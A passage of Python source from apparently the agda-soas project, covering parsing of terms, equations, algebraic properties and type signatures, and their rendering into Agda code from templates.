return Con(ops[s], [], ctx, mctx)
elif s in ctx:
return Var(s, ctx, mctx)
elif s in mctx:
return MVar(s, [], ctx, mctx)
elif s.startswith("O") and s[1:] in mctx:
return MVar(s, [], ctx, mctx, is_hole=True)
else:
raise Exception("Unbound variable: " + "'" + s + "'")
elif re.search("^\w*\[.*\]$", s): # If a metavariable
m = re.search("^(\w)*\[(.*)\]$", s)
mvar = m.group(1)
env = m.group(2)
if not env:
return MVar(mvar, [], ctx, mctx, is_hole=mvar.startswith("O"))
else:
return MVar(mvar, [Term.parse_term(t, ctx, mctx, ops) for t in split_tuple(env)], ctx, mctx)
elif re.search("^([\w ]*)\.(.*)$", s): # If a variable under binders
m = re.search("^([\w ]*)\.(.*)$", s)
bound = m.group(1).split()
tm = m.group(2)
return Term.parse_term(tm, bound + ctx, mctx, ops)
elif re.search("^(\w*) *\((.*)\)$", s): # If an expression
m = re.search("^(\w*) *\((.*)\)$", s)
op = m.group(1)
args = m.group(2)
return Con(ops[op], [Term.parse_term(t, ctx, mctx, ops) for t in split_tuple(args)], ctx, mctx)
else:
raise Exception("Can't parse: " + s)
def __repr__(self):
return str(vars(self))
class Var(Term):
"""Variables are terms with a de Bruijn index.
"""
def __init__(self, var, ctx, mctx):
super().__init__(ctx, mctx)
self.db = ctx.index(var)
def apply_ren(self, ren_dict):
pass
def apply_ren_sym(self, ren_dict):
pass
def render(self):
return "x" + num_to_ix(self.db)
class MVar(Term):
"""Metavariables are terms with a metavariable de Bruijn index and a term environment.
"""
def __init__(self, mvar, env, ctx, mctx, is_hole=False):
super().__init__(ctx, mctx)
self.mvar = mvar
self.mdb = mctx.index(mvar.replace("O", ""))
self.env = env
self.is_hole = is_hole # If the metavariable intends to denote a hole in a congruence context.
def apply_ren(self, ren_dict):
for t in self.env:
t.apply_ren(ren_dict)
def apply_ren_sym(self, ren_dict):
for t in self.env:
t.apply_ren_sym(ren_dict)
def render(self):
mvs = "◌" + num_to_uix(self.mdb) if self.is_hole else num_to_frak(self.mdb)
return mvs + \
(f"⟨ {' ◂ '.join([wrap(t.render(), sep='⟨ ') for t in self.env])} ⟩"
if self.env else "")
class Con(Term):
"""A constructor is a term with a name and list of argument terms.
"""
def __init__(self, name, args, ctx, mctx):
super().__init__(ctx, mctx)
self.name = name
self.args = args
def apply_ren(self, ren_dict):
if self.name in ren_dict: self.name = ren_dict[self.name]
for ar in self.args:
ar.apply_ren(ren_dict)
def apply_ren_sym(self, ren_dict):
self.name = apply_replacements(self.name, ren_dict)
for ar in self.args:
ar.apply_ren_sym(ren_dict)
def render(self):
if self.args:
if "_" in self.name:
return fill_underscores(self.name, [t.render() if isinstance(t, MVar) else wrap(t.render()) for t in self.args])
else:
return self.name + " " + " ".join([wrap(t.render()) for t in self.args])
else: return self.name
class Eq:
"""Equation between two second-order terms.
"""
def __init__(self, name, mctx_s, ctx_s, tm1, tm2, ops, derived=False, raw_str=""):
self.name = name
mctx, self.mctx_tys = Eq.unzip_ctx(mctx_s)
self.mctx_tys = [Op.parse_so_type(t) for t in self.mctx_tys]
ctx, self.ctx_tys = Eq.unzip_ctx(ctx_s)
self.tm1 = Term.parse_term(tm1, ctx, mctx, ops)
self.tm2 = Term.parse_term(tm2, ctx, mctx, ops)
self.derived = derived
self.derived_def = ""
self.raw_str = raw_str
def __eq__(self, o: object) -> bool:
return self.name == o.name
def __hash__(self) -> int:
return hash(self.name)
def unzip_ctx(s):
"""Turn a [var : type] context into a list of variable names and types.
Args:
s (str): A string of double space-separated var : type pair list.
Returns:
(list[str], list[str]): The list of variable names and their types.
"""
ctx = split_spaces(s)
vs = []
ts = []
for v, *t in [(splitstrip(v, ":")) for v in ctx]:
t = t[0] if t else "*"
if " " in v:
ws = v.split()
vs += ws
ts += [t] * len(ws)
else:
vs.append(v)
ts.append(t)
return (vs, ts)
def render_ctx(ctx, sep="∙"):
if not ctx:
return "∅"
else:
return "⌊ " + f" {sep} ".join([wrap(t) for t in ctx]) + " ⌋"
def render_comps(self):
"""Render components of an equality judgment: equality name,
metavariable context, object variable context, and the two terms.
"""
mctx_str = ""
if not self.mctx_tys:
mctx_str = "⁅⁆"
else:
mctx_str = " ⁆ ⁅ ".join([f"{Eq.render_ctx(bound, '·')[2:-2]} ⊩ {ty}" if bound else ty for bound, ty in self.mctx_tys])
mctx_str = "⁅ " + mctx_str + " ⁆̣"
return(self.name, mctx_str, Eq.render_ctx(self.ctx_tys), self.tm1.render(), self.tm2.render())
def render_padded(comps, pn, pm, pc, pt, eq_sign="≋ₐ"):
"""Render components with padding.
Args:
comps (list[(str, list[str], list[str], Term, Term)]): A list of equality components
pn (int): Name padding
pm (int): Metavariable context padding
pc (int): Object variable context padding
pt (int): Term padding
eq_sign (str, optional): Equality sign to use between terms. Defaults to "≋ₐ".
Returns:
str: String representation of the equation.
"""
n, m, c, t1, t2 = comps
return f"{rpad(n, pn)} : {rpad(m, pm if '⁅⁆' not in m else pm-1)} ▹ {cpad(c, pc)} ⊢ {lpad(t1, pt)} {eq_sign} {t2}"
def render(self, eq_sign="≋ₐ"):
"""Render equality without padding.
Args:
eq_sign (str, optional): Equality sign to use between terms. Defaults to "≋ₐ".
Returns:
str: String representation of the equality.
"""
n, m, c, t1, t2 = self.render_comps()
return Eq.render_padded((n, m, c, t1, t2), len(n), len(m), len(c), len(t1), eq_sign)
def parse_equations(eqs, ops):
"""Parse list of equation strings.
Args:
eqs (list[string]): List of equation strings.
ops (dict[str, str]): Mapping of operator names to symbols.
Returns:
(list[str], list[AlgProp]): The list of custom equations, and the list of algebraic properties.
"""
eeqs = []
prop_list = ['unit of', 'commutative', 'associative', 'distributes over', 'inverse of',
'annihilates', 'idempotent', 'absorbs', 'absorptive', 'involutive']
props = []
for eq in eqs:
if not any_in(prop_list, eq):
eeqs.append(Eq.parse_eq(eq, ops))
else:
if 'unit of' in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*unit of\s+'(\w+)'$", eq)
unit, side, op = m.groups()
props.append(Unit(unit, op, side))
elif "annihilates" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*annihilates\s+'(\w+)'$", eq)
unit, side, op = m.groups()
props.append(Annih(unit, op, side))
elif "distributes over" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*distributes over\s+'(\w+)'$", eq)
op1, side, op2 = m.groups()
props.append(Dist(op1, op2, side))
elif "absorbs" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*absorbs\s+'(\w+)'$", eq)
op1, side, op2 = m.groups()
props.append(Absorb(op1, op2, side))
elif "inverse of" in eq:
m = re.search("^'(\w+)'\s+(left|right)?\s*inverse of\s+'(\w+)'\s+with\s+'(\w+)'$", eq)
uop, side, op, unit = m.groups()
props.append(Inverse(uop, op, unit, side))
elif "absorptive" in eq:
m = re.search("^'(\w+)'\s+and\s+'(\w+)'\s+absorptive$", eq)
op1, op2 = m.groups()
props.append(Absorb(op1, op2, None))
props.append(Absorb(op2, op1, None))
else:
m = re.search("^'(\w+)'\s+(.*)$", eq)
op = m.group(1)
kws = splitstrip(m.group(2), ",")
if 'associative' in kws:
props.append(Assoc(op))
if 'commutative' in kws:
props.append(Comm(op))
if 'idempotent' in kws:
props.append(Idemp(op))
if 'involutive' in kws:
props.append(Invol(op))
return eeqs, props
def prop_to_eq(prop, all_props, ops):
"""Convert property to equation, marking it as 'derivable' if it
is directed and the top-level operator is commutative.
Args:
prop (AlgProp): Algebraic property
all_props (list[AlgProp]): List of existing algebraic properties
ops (dict[str, str]): Mapping of operator names to symbols.
Returns:
Eq: Equation based on the property, optionally derivable.
"""
if isinstance(prop, DirAlgProp) and Comm(prop.op) in all_props:
prop.side = Side.BOTH
prop.derived = True
return prop.eq(ops)
else:
return prop.eq(ops)
def parse_prop(s):
"""Parse algebraic property.
Args:
s (str): String representation of algebraic property
Returns:
AlgProp: Appropriate algebraic property.
"""
props = []
if 'unit of' in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*unit of\s+'(\w+)'$", s)
unit, side, op = m.groups()
props.append(Unit(unit, op, side))
elif "annihilates" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*annihilates\s+'(\w+)'$", s)
unit, side, op = m.groups()
props.append(Annih(unit, op, side))
elif "distributes over" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*distributes over\s+'(\w+)'$", s)
op1, side, op2 = m.groups()
props.append(Dist(op1, op2, side))
elif "absorbs" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*absorbs\s+'(\w+)'$", s)
op1, side, op2 = m.groups()
props.append(Absorb(op1, op2, side))
elif "inverse of" in s:
m = re.search("^'(\w+)'\s+(left|right)?\s*inverse of\s+'(\w+)'\s+with\s+'(\w+)'$", s)
uop, side, op, unit = m.groups()
props.append(Inverse(uop, op, unit, side))
elif "absorptive" in s:
m = re.search("^'(\w+)'\s+and\s+'(\w+)'\s+absorptive$", s)
op1, op2 = m.groups()
props.append(Absorb(op1, op2, None))
props.append(Absorb(op2, op1, None))
else:
m = re.search("^'(\w+)'\s+(.*)$", s)
op = m.group(1)
kws = splitstrip(m.group(2), ",")
if 'associative' in kws:
props.append(Assoc(op))
if 'commutative' in kws:
props.append(Comm(op))
if 'idempotent' in kws:
props.append(Idemp(op))
if 'involutive' in kws:
props.append(Invol(op))
return props
def parse_eq(s, ops):
"""Parse equation.
Args:
s (str): String representation of an equation
ops (dict[str, str]): Mapping of operator names to symbols
Returns:
Eq: Parsed equation
"""
derived = False
if s[0] == "{" and s[-1] == "}": # If surrounded by {...}, equation is derived
derived = True
s = s[1:-1]
if "|-" in s:
m = re.search("^\(([^ )]+)\)([^|]*)\|>([^|]*)\|-([^=]*)=([^=]*)$", s)
if not m: raise Exception("Syntax error: " + s)
name, mctx_s, ctx_s, tm1, tm2 = [m.group(n).strip() for n in range(1,6)]
else: # Object variable context is optional
m = re.search("^\(([^ )]+)\)([^|]*)\|>([^=]*)=([^=]*)$", s)
if not m: raise Exception("Syntax error: " + s)
name, mctx_s, tm1, tm2 = [m.group(n).strip() for n in range(1,5)]
ctx_s = ""
return Eq(name, mctx_s, ctx_s, tm1, tm2, ops, derived, s)
def __str__(self):
return self.raw_str
def __repr__(self):
return str(vars(self))
class Theory:
"""Equational theory of a second-order syntax, consisting of equations and algebraic properties.
"""
def __init__(self, props, new_eqs, ops):
self.props = props
self.new_eqs = new_eqs
self.ops = ops
@property
def all_eqs(self):
return list(dict.fromkeys(flatten([Eq.prop_to_eq(p, self.props,self.ops) for p in self.props]) + self.new_eqs))
@property
def eqs(self):
return [eq for eq in self.all_eqs if not eq.derived]
@property
def derived_eqs(self):
return [eq for eq in self.all_eqs if eq.derived]
@staticmethod
def mk(prop_lines, eq_lines, ops):
"""Construct theory from string descriptions of properties and equations.
Args:
prop_lines (list[str]): Algebraic properties as strings
eq_lines (list[str]): Equations as strings
ops (dict[str, str]): Mapping of operator names to symbols
Returns:
Theory: Theory with properties and equations.
"""
props = flatten([Eq.parse_prop(pl) for pl in prop_lines])
eqs = [Eq.parse_eq(el, ops) for el in eq_lines]
return Theory(props, eqs, ops)
def render_axioms(self):
"""Render equational axioms with padding
Returns:
list[str]: Rendered equations
"""
mn, mm, mc, mt = 0, 0, 0, 0
comps = [eq.render_comps() for eq in self.eqs]
for n, m, c, t1, _ in comps:
if mn < len(n): mn = len(n)
if mm < len(m): mm = len(m)
if mc < len(c): mc = len(c)
if mt < len(t1): mt = len(t1)
return [Eq.render_padded(cs, mn, mm, mc, mt) for cs in comps]
class AlgProp:
"""Base class for equational properties.
"""
def __eq__(self, o: object) -> bool:
if isinstance(o, self.__class__):
return self.__dict__ == o.__dict__
else:
return NotImplemented
def __repr__(self) -> str:
return str((self.__class__.__name__)) + " " + str(vars(self))
def __hash__(self) -> int:
return hash(tuple(sorted(self.__dict__.items())))
class Comm(AlgProp):
"""Commutativity"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}C) a b |> {self.op}(a, b) = {self.op}(b, a)", ops)]
class Assoc(AlgProp):
"""Associativity"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}A) a b c |> {self.op} ({self.op}(a, b), c) = {self.op} (a, {self.op}(b, c))", ops)]
class Idemp(AlgProp):
"""Idempotence"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}I) a |> {self.op}(a, a) = a", ops)]
class Invol(AlgProp):
"""Involution"""
def __init__(self, op) -> None:
self.op = op
def eq(self, ops):
return [Eq.parse_eq(f"({ops[self.op].strip('_')}²) a |> {self.op}({self.op} (a)) = a", ops)]
class Side(Enum):
"""Orientation of directed properties (e.g. left unit, right distributivity).
"""
LEFT = 1
RIGHT = 2
BOTH = 3
class DirAlgProp(AlgProp):
"""Directed algebraic property with a top-level binary operation and an orientation.
"""
def __init__(self, op, side) -> None:
super().__init__()
self.op = op
self.side = Side.BOTH if not side else (Side.LEFT if 'left' in side else Side.RIGHT)
self.derived = False
def eqs_and_deriv(self, _):
"""Left and right equations, and derived definition.
"""
pass
def eq(self, ops):
"""A directed property may give rise to two equations,
with the right one potentially derivable from the left one."""
left, right, deriv = self.eqs_and_deriv(ops)
eqs = []
if self.side in [Side.LEFT, Side.BOTH]:
eqs.append(Eq.parse_eq(left, ops))
# Add the right-side equation with its derivation
if self.side in [Side.RIGHT, Side.BOTH]:
eq = Eq.parse_eq(right, ops)
eq.derived_def = deriv
eq.derived = self.derived
eqs.append(eq)
return eqs
class Unit(DirAlgProp):
"""Unit"""
def __init__(self, unit, op, side) -> None:
super().__init__(op, side)
self.unit = unit
def eqs_and_deriv(self, ops):
op_sym = ops[self.op].strip('_')
return (
f"({ops[self.unit]}U{op_sym}ᴸ) a |> {self.op} ({self.unit}, a) = a",
f"({ops[self.unit]}U{op_sym}ᴿ) a |> {self.op} (a, {self.unit}) = a",
f"{ops[self.unit]}U{op_sym}ᴿ = tr (ax {op_sym}C with《 𝔞 ◃ {ops[self.unit]} 》) (ax {ops[self.unit]}U{op_sym}ᴸ with《 𝔞 》)")
class Annih(DirAlgProp):
"""Annihilation"""
def __init__(self, unit, op, side) -> None:
super().__init__(op, side)
self.unit = unit
def eqs_and_deriv(self, ops):
op_sym = ops[self.op].strip('_')
return (
f"({ops[self.unit]}X{op_sym}ᴸ) a |> {self.op} ({self.unit}, a) = {self.unit}",
f"({ops[self.unit]}X{op_sym}ᴿ) a |> {self.op} (a, {self.unit}) = {self.unit}",
f"{ops[self.unit]}X{op_sym}ᴿ = tr (ax {op_sym}C with《 𝔞 ◃ {ops[self.unit]} 》) (ax {ops[self.unit]}X{op_sym}ᴸ with《 𝔞 》)")
class Absorb(DirAlgProp):
"""Absorption"""
def __init__(self, op, op2, side) -> None:
super().__init__(op, side)
self.op2 = op2
def eqs_and_deriv(self, ops):
op1_sym = ops[self.op].strip('_')
op2_sym = ops[self.op2].strip('_')
return (
f"({op1_sym}B{op2_sym}ᴸ) a b |> {self.op} ({self.op2} (a, b), a) = a",
f"({op1_sym}B{op2_sym}ᴿ) a b |> {self.op} (a, {self.op2} (a, b)) = a",
f"{op1_sym}B{op2_sym}ᴿ = tr (ax {op1_sym}C with《 𝔞 ◃ ({Term.parse_term(f'{self.op2} (a, b)', [], ['a','b'],ops).render()}) 》) (ax {op1_sym}B{op2_sym}ᴸ with《 𝔞 ◃ 𝔟 》)")
class Inverse(DirAlgProp):
"""Inverse"""
def __init__(self, uop, bop, unit, side) -> None:
super().__init__(bop, side)
self.uop = uop
self.unit = unit
def eqs_and_deriv(self, ops):
uop_sym = ops[self.uop].strip('_')
bop_sym = ops[self.op].strip('_')
return (
f"({uop_sym}N{bop_sym}ᴸ) a |> {self.op} ({self.uop} (a), a) = {self.unit}",
f"({uop_sym}N{bop_sym}ᴿ) a |> {self.op} (a, {self.uop} (a)) = {self.unit}",
f"{uop_sym}N{bop_sym}ᴿ = tr (ax {bop_sym}C with《 𝔞 ◃ ({Term.parse_term(f'{self.uop} (a)', [], ['a'],ops).render()}) 》) (ax {uop_sym}N{bop_sym}ᴸ with《 𝔞 》)")
class Dist(DirAlgProp):
"""Distributivity"""
def __init__(self, op, op2, side) -> None:
super().__init__(op, side)
self.op2 = op2
def eqs_and_deriv(self, ops):
op1_sym = ops[self.op].strip('_')
op2_sym = ops[self.op2].strip('_')
symb = lambda s: Term.parse_term(s, [], ['a','b','c','d','e'], ops).render()
return (
f"({op1_sym}D{op2_sym}ᴸ) a b c |> {self.op} (a, {self.op2} (b, c)) = {self.op2} ({self.op}(a, b), {self.op}(a, c))",
f"({op1_sym}D{op2_sym}ᴿ) a b c |> {self.op} ({self.op2} (a, b), c) = {self.op2} ({self.op}(a, c), {self.op}(b, c))",
(f"{op1_sym}D{op2_sym}ᴿ = begin\n "
f"{symb(f'{self.op} ({self.op2} (a, b), c)')} ≋⟨ ax {op1_sym}C with《 {symb(f'{self.op2} (a, b)')} ◃ 𝔠 》 ⟩\n "
f"{symb(f'{self.op} (c, {self.op2} (a, b))')} ≋⟨ ax {op1_sym}D{op2_sym}ᴸ with《 𝔠 ◃ 𝔞 ◃ 𝔟 》 ⟩\n "
f"{symb(f'{self.op2} ({self.op}(c, a),{self.op}(c,b))')} ≋⟨ cong₂[ ax {op1_sym}C with《 𝔠 ◃ 𝔞 》 ][ ax {op1_sym}C with《 𝔠 ◃ 𝔟 》 ]inside {symb(f'{self.op2} (Od, Oe)')} ⟩\n "
f"{symb(f'{self.op2} ({self.op}(a, c),{self.op}(b,c))')} ∎"))
```
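For context, a minimal sketch of how one of these directed properties expands into equation strings — assuming the classes above are exposed from `gen/eq.py` and that the `ops` dictionary maps operator names to their rendered symbols (both are assumptions, not confirmed by the source):
```python
# Illustrative only: the module path and the ops-dict format are assumptions.
from gen.eq import Unit

ops = {'add': '_+_', 'unit': '0'}     # operator name -> rendered symbol (assumed format)
u = Unit('unit', 'add', side=None)    # no side given, so both orientations are generated
left, right, deriv = u.eqs_and_deriv(ops)
print(left)    # (0U+ᴸ) a |> add (unit, a) = a
print(right)   # (0U+ᴿ) a |> add (a, unit) = a
# deriv holds the proof term deriving the right unit law from the left one via commutativity
```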
#### File: agda-soas/gen/type.py
```python
class TyOp:
"""Type operator of a sype signature.
"""
def __init__(self, name, arity, infix=None, derived=False):
"""Initialise type operator
Args:
name (str): Name of a operator (can be symbol with underscores)
arity (number): Arity of the operator
infix (str, optional): str describing the associativity and fixity of the operator. Defaults to None.
"""
self.name = name
self.arity = arity
self.padding = 0 # Padding required based on the longest type operator name
self.derived = derived
self.infix = None
if infix:
if infix[0] in ['l', 'r']:
self.infix = (infix[0], infix[1:])
else: self.infix = ('', infix)
def __eq__(self, o: object) -> bool:
return self.name == o.name
def __hash__(self) -> int:
return hash(self.name)
def spec(self):
"""Specification of a type operator
Returns:
dict: Dictionary representing the type operator
"""
spec = {'TyOpName': self.name, 'TyOpAr': self.arity}
if self.infix:
spec['TyFixity'] = self.infix
return spec
def __repr__(self):
return str(self.spec())
def __str__(self):
return f"{self.name}{' ' * self.padding} : {self.arity}-ary" + (f" | {self.infix[0]}{self.infix[1]}" if self.infix else "")
class TypeSignature:
"""Simple type signature of a second-order syntax
"""
def __init__(self, name, *ops: list[TyOp]):
"""Initialise type signature with type name and list of type operator lists.
Args:
name (str): Name of the type signature
*ops (list[TyOp]): List of type operators
"""
self.name = name
self.all_ops = list(ops)
@property
def symbols(self):
symbols = set()
max_op_len = max([len(tc.name) for tc in self.all_ops])
for op in self.all_ops:
symbols = symbols.union(set(op.name.split('_')))
op.padding = max_op_len - len(op.name)
symbols.discard("")
return symbols
@property
def ops(self):
return [op for op in self.all_ops if not op.derived]
@property
def derived_ty_ops(self):
return [op for op in self.all_ops if op.derived]
def render_ty_decl(self):
"""Render constructors of type declaration.
Returns:
list[str]: List of constructors for the type declaration
"""
ls = []
ls += [f"{op.name}{' ' * op.padding} : {(self.name + ' → ')*op.arity + self.name}"
for op in self.ops]
return ls
def render_fixity(self):
"""Render fixity information for type operators.
Returns:
list[str]: Fixity declarations for the operators
"""
ls = []
for op in self.ops:
if op.infix:
assoc, infix = op.infix
ls.append(f"infix{assoc} {infix} {op.name}")
return ls
def render_all(self):
if isinstance(self, Unsorted):
return "open import SOAS.Common"
ls = f"-- Type declaration\ndata {self.name} : Set where\n "
return ls + "\n ".join(self.render_ty_decl()) + "\n" + "\n".join(self.render_fixity())
def spec(self):
"""Specification of a type signature.
Returns:
dict: Dictionary representing the type signature
"""
return {'TyName' : self.name,
'TyOps' : [tc.spec() for tc in self.ops ] }
def __repr__(self):
return str(self.spec())
def __str__(self):
ls = [f"type"]
ls += [' ' + str(tc) for tc in self.ops]
return '\n'.join(ls)
# Special case of an unsorted type signature: type name '*T' and a single nullary type constructor
class Unsorted(TypeSignature):
def __init__(self):
return super().__init__("*T", TyOp('*', 0))
```
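A small usage sketch of the type-signature classes above; the operator names here are arbitrary examples, not taken from the repository:
```python
# Illustrative sketch; operator names are made up for the example.
from gen.type import TyOp, TypeSignature

ty = TypeSignature("PropT", TyOp('⊤', 0), TyOp('_∧_', 2, infix='r30'))
print(ty.symbols)                      # {'⊤', '∧'} (set order may vary); also sets padding
print('\n'.join(ty.render_ty_decl()))  # ⊤   : PropT
                                       # _∧_ : PropT → PropT → PropT
print('\n'.join(ty.render_fixity()))   # infixr 30 _∧_
```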
#### File: JoeyEremondi/agda-soas/soas.py
```python
import argparse
from string import Template
import os
from os import path
from pathlib import Path, PurePath
from collections import OrderedDict
from typing import Type
from gen.type import *
from gen.term import *
from gen.eq import *
class Syntax:
"""Second-order syntax, consisting of a first-order type signature,
second-order term signature and second-order equational theory.
"""
def __init__(self, syn_name, ty_sig, tm_sig, theory):
self.syn_name = syn_name
self.ty_sig = ty_sig
self.tm_sig = tm_sig
self.theory = theory
self.tm_sig.extract_type_vars(ty_sig.symbols)
self.tm_sig.all_ty_vars()
self.tm_sig.ty_name = ty_sig.name
def render_agda(self, out):
"""Render the Agda files for the signature.
"""
if not out:
out = Path("out")
temp_strings = {
'syn_name': self.syn_name,
'type': self.ty_sig.name,
'type_fixity': '\n' + '\n'.join(self.ty_sig.render_fixity()) + '\n',
'type_decl': self.ty_sig.render_all(),
'derived_ty_ops': "\n".join(["\n-- Derived types"] + [f"{op.name} : {(self.ty_sig.name + ' → ')*op.arity + self.ty_sig.name}\n{op.name} = ?" for op in self.ty_sig.derived_ty_ops]) if self.ty_sig.derived_ty_ops else "",
'ty_vars': ' '.join(self.tm_sig.ty_vars),
'fst_ty_var': self.tm_sig.ty_vars[0],
'operator_decl': '\n '.join(self.tm_sig.render_op_symbols()),
'sig_string' : str(self),
'sig': self.tm_sig.name,
'sig_decl': '\n ; '.join(self.tm_sig.render_tm_sig()),
'syn_constructors': '\n '.join([op.render_op_ctor(self.tm_sig.name) for op in self.tm_sig.ops]),
'op_fixity': '\n '.join(self.tm_sig.render_op_fixity()),
'alg_patterns': "\n ".join([op.render_alg_pat() for op in self.tm_sig.ops]) if self.tm_sig.ops else "()",
'sem_patterns': "\n ".join([op.render_sem_pat() for op in self.tm_sig.ops]),
'alg_hom_patterns': "\n ".join([op.render_alg_hom_pat() for op in self.tm_sig.ops]) if self.tm_sig.ops else "⟨𝑎𝑙𝑔⟩ ()",
'alg_unique_patterns': "\n ".join([op.render_alg_unique_pat() for op in self.tm_sig.ops]),
'derived_tm_ops': "\n".join(["-- Derived operations"] + [f"{op.render_op_ctor(self.tm_sig.name + ' 𝔛')}\n{op.sym} = ?" for op in self.tm_sig.derived_tm_ops]) if self.tm_sig.derived_tm_ops else "",
'axioms': "\n ".join(self.theory.render_axioms()) if self.theory.eqs else "",
'derived_eqs': "\n".join(['-- Derived equations'] + [f"{eq.render(eq_sign='≋')}\n{eq.derived_def or eq.name + ' = ?'}" for eq in self.theory.derived_eqs] if self.theory.derived_eqs else "")
}
result = ""
if not path.exists(path.join(out, self.syn_name)):
os.makedirs(path.join(out, self.syn_name))
for tf in os.listdir(path.join('gen','templates')):
if not self.theory and tf == "Equality.agda":
continue
with open(path.join('gen','templates',tf), 'r') as f:
src = Template(f.read())
result = src.substitute(temp_strings)
with open(path.join(out, self.syn_name, tf), "w") as output:
output.write(result)
def derive_tokens(self, tokens):
"""Mark operations or equations as derived.
"""
for op in self.ty_sig.all_ops:
if op.name in tokens: op.derived = True
for op in self.tm_sig.all_ops:
if op.name in tokens or op.sym in tokens: op.derived = True
for eq in self.theory.all_eqs:
if eq.name in tokens: eq.derived = True
def hide_tokens(self, tokens):
"""Delete tokens (types, terms, equations) from the syntax.
"""
self.ty_sig.all_ops = [op for op in self.ty_sig.all_ops if op.name not in tokens and op.name != "*"]
self.tm_sig.all_ops = [op for op in self.tm_sig.all_ops if op.name not in tokens and op.sym not in tokens]
self.theory.all_eqs = [eq for eq in self.theory.all_eqs if eq.name not in tokens]
def keep_tokens(self, tokens):
"""Keep specified tokens (types, terms, equations) from the syntax.
"""
self.ty_sig.all_ops = [op for op in self.ty_sig.all_ops if op.name in tokens or op.name == "*"]
self.tm_sig.all_ops = [op for op in self.tm_sig.all_ops if op.name in tokens or op.sym in tokens]
self.theory.all_eqs = [eq for eq in self.theory.all_eqs if eq.name in tokens]
def rename_tokens(self, ren_dict):
"""Change full token names.
Args:
ren_dict (dict[str, str]): Mapping from old names to new.
"""
for tm_op in self.tm_sig.all_ops:
if tm_op.name in ren_dict: tm_op.name = ren_dict[tm_op.name]
if tm_op.sym in ren_dict: tm_op.sym = ren_dict[tm_op.sym]
for eq in self.theory.all_eqs:
if eq.name in ren_dict: eq.name = ren_dict[eq.name]
eq.raw_str = apply_replacements(eq.raw_str, ren_dict)
eq.tm1.apply_ren(ren_dict)
eq.tm2.apply_ren(ren_dict)
for prop in self.theory.props:
for k, v in prop.__dict__.items():
if v in ren_dict: prop.__dict__[k] = ren_dict[v]
new_ops = {}
for o, s in self.theory.ops.items():
new_ops[ren_dict[o] if o in ren_dict else o] = ren_dict[s] if s in ren_dict else s
self.theory.ops = new_ops
def rename_sym_in_tokens(self, ren_dict):
"""Change occurrences of symbols in tokens.
Args:
ren_dict (dict[str, str]): Mapping from old symbols to new.
"""
for tm_op in self.tm_sig.all_ops:
tm_op.name = apply_replacements(tm_op.name, ren_dict)
tm_op.sym = apply_replacements(tm_op.sym, ren_dict)
for eq in self.theory.all_eqs:
eq.name = apply_replacements(eq.name, ren_dict)
eq.raw_str = apply_replacements(eq.raw_str, ren_dict)
eq.tm1.apply_ren_sym(ren_dict)
eq.tm2.apply_ren_sym(ren_dict)
for prop in self.theory.props:
for k, v in prop.__dict__.items():
if v in ren_dict: prop.__dict__[k] = apply_replacements(prop.__dict__[k], ren_dict)
new_ops = {}
for o, s in self.theory.ops.items():
new_k = apply_replacements(o, ren_dict)
new_v = apply_replacements(s, ren_dict)
new_ops[new_k] = new_v
self.theory.ops = new_ops
def change_fixity(self, fix_dict):
for tm_op in self.tm_sig.all_ops:
if tm_op.name in fix_dict:
tm_op.infix_spec = fix_dict[tm_op.name]
def spec(self):
return {'TypeSignature' : self.ty_sig.spec(), 'TermSignature': self.tm_sig.spec()}
def __repr__(self):
return str(self.spec())
def __str__(self):
return (f"syntax {self.syn_name + (' | ' + self.tm_sig.name if self.tm_sig.name != self.syn_name else '')}\n\n{str(self.ty_sig)}\n\n{str(self.tm_sig)}\n\ntheory\n " + "\n ".join([str(eq) for eq in self.theory.all_eqs]))
def combine_syntaxes(syn1: Syntax, syn2: Syntax, syn_name="", tm_name=""):
"""Combine two syntaxes into one.
Args:
syn1 (Syntax): Base syntax
syn2 (Syntax): Extension syntax
syn_name (str, optional): Override syntax name. Defaults to "".
tm_name (str, optional): Override term signature name. Defaults to "".
Returns:
Syntax: Combined syntax
"""
override = syn2.tm_sig.name != syn2.syn_name
if isinstance(syn2.ty_sig, Unsorted): # Handle unsorted type signatures separately
if not syn1.ty_sig.ops or not syn2.ty_sig.ops:
com_ty_sig = Unsorted()
else:
com_ty_sig = syn1.ty_sig
else:
com_ty_sig = TypeSignature(syn2.ty_sig.name if override else syn1.ty_sig.name, *OrderedDict.fromkeys(syn1.ty_sig.all_ops + syn2.ty_sig.all_ops))
com_tm_sig = TermSignature(syn2.tm_sig.name if override else syn1.tm_sig.name, *OrderedDict.fromkeys((syn1.tm_sig.all_ops + syn2.tm_sig.all_ops)))
if tm_name:
if not isinstance(com_ty_sig, Unsorted):
com_ty_sig.name = tm_name + "T"
com_tm_sig.name = tm_name
com_thr = Theory(list_union(syn1.theory.props, syn2.theory.props), list_union(syn1.theory.new_eqs, syn2.theory.new_eqs), com_tm_sig.op_sym_dict)
return Syntax(
syn_name or syn2.syn_name,
com_ty_sig, com_tm_sig,
com_thr)
def combine_syntax_list(syns: list[Syntax]):
"""Combine a list of syntax descriptions"""
if len(syns) == 1:
return syns[0]
return combine_syntaxes(combine_syntax_list(syns[:-1]), syns[-1])
def op(op_desc, sym=None, infix=None, derived=False):
"""Parse operator description."""
name, *ty = op_desc.split(":")
*arg_tys, ret_ty = splitstrip(ty[0], "->")
return Op(
name.strip(),
*split_spaces(arg_tys[0]) if arg_tys else [],
sort=ret_ty.strip(),
sym=sym,
infix=infix,
derived=derived)
def parse_mods(mods):
"""Parse import modifiers: hiding, using, renaming."""
mods = splitstrip(mods, ";")
mod_dict = {m.split()[0] : splitstrip(m[len(m.split()[0]):], ",") for m in mods}
if 'renaming' in mod_dict:
mod_dict['renaming_sym'] = dict([(splitstrip(s[6:], "to")) for s in mod_dict['renaming'] if "symbol" in s])
ren_dict = dict([(splitstrip(s, "to")) for s in mod_dict['renaming'] if "symbol" not in s])
mod_dict['renaming'] = ren_dict.copy()
